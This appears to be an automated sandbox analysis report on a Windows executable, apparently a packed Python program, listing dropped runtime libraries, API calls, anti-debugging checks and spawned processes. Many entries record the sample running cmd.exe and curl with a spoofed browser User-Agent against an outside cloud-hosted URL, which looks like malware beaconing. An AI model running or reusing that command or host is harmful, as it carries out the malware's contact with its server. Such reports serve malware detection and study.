Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-fibers-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\python311.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68922\VCRUNTIME140.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF6399B6EA0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00007FF6399B6EA0

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-fibers-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\python311.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-17320

Source: C:\Users\user\Desktop\file.exe

API coverage: 2.4 %

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399B85A0 FindFirstFileExW,FindClose,	0_2_00007FF6399B85A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399B79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF6399B79B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399D0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF6399D0B84
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399B85A0 FindFirstFileExW,FindClose,	1_2_00007FF6399B85A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399B79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00007FF6399B79B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399D0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF6399D0B84
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF1CD4E0 FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,	1_2_00007FFDFF1CD4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF1CD274 FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,	1_2_00007FFDFF1CD274

Source: file.exe, 00000001.00000002.3015739546.0000024624C63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: curl.exe, 00000004.00000002.1778152644.0000016B7F679000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.1882730514.000001DC607C9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1986571053.000002C391113000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.2091064539.0000023561B53000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000003.2196712598.0000027F4B1C6000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000002.2300773885.0000021670889000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000019.00000003.2405445191.0000017D4E424000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001D.00000002.2509049134.0000020D856D8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000020.00000003.2613841656.00000268D07B4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000023.00000003.2717378662.0000026064D43000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000026.00000002.2825899074.000002913BBA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF6399BC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF6399BC44C

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF6399D2790 GetProcessHeap,

0_2_00007FF6399D2790

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399BC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6399BC44C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399BBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF6399BBBC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399BC62C SetUnhandledExceptionFilter,	0_2_00007FF6399BC62C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399C9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6399C9924
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399BC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF6399BC44C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399BBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FF6399BBBC0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399BC62C SetUnhandledExceptionFilter,	1_2_00007FF6399BC62C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399C9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF6399C9924
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF19F714 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FFDFF19F714
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF1CB0AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FFDFF1CB0AC
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFE14632600 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FFE14632600
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFE14632BC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FFE14632BC0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFE1A451B00 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FFE1A451B00
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFE1A451530 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FFE1A451530
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFE1A4A0468 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FFE1A4A0468

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
